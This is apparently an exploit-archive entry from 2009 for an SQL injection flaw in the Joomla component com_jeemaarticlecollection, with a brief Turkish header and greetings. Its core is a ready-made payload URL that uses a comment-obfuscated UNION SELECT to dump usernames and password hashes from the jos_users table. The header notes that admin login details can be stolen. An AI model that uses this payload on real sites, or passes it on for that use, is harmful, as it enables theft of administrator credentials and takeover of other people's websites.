Joomla Component com_jeemaarticlecollection SQL injection

2009-12-24T00:00:00
ID 1337DAY-ID-10385
Type zdt
Reporter Fl0riX
Modified 2009-12-24T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =========================================================
Joomla Component com_jeemaarticlecollection SQL injection 
=========================================================

<------------------- header data start ------------------- >
 
#############################################################
       Joomla Component com_jeemaarticlecollection SQL injection Vulnerability                                         
#############################################################
 
#author        : Fl0riX
 
# Greetz          : BARCOD3 , Septemb0x, Deep-Power,DreamPower,Pyske,3kb3r
 
# Name        : com_jeemaarticlecollection
 
# Bug Type       : SQL Injection
 
# Infection      : Admin login bilgileri al�nabilir.
 
# Bug Fix Advice : Zararl� karakterler filtrelenmelidir. Kimsesizli�im O Dereceye Vard� Ki �evremde Bela Girdab�ndan Ba�ka D�nen Kimse Yok.(!)
 
# Note : Kimsesizli�im O Dereceye Vard� Ki �evremde Bela Girdab�ndan Ba�ka D�nen Kimse Yok.(!)
 
#############################################################
 
< ------------------- header data end of ------------------- >
 
< -- bug code start -- >
 
path/index.php?view=longview&catid=null/**/union/**/select/**/concat(username,0x3a,password),2/**/from/**/jos_users&Itemid=107&option=com_jeemaarticlecollection
 
< -- bug code end of -- > 



#  0day.today [2018-01-01]  #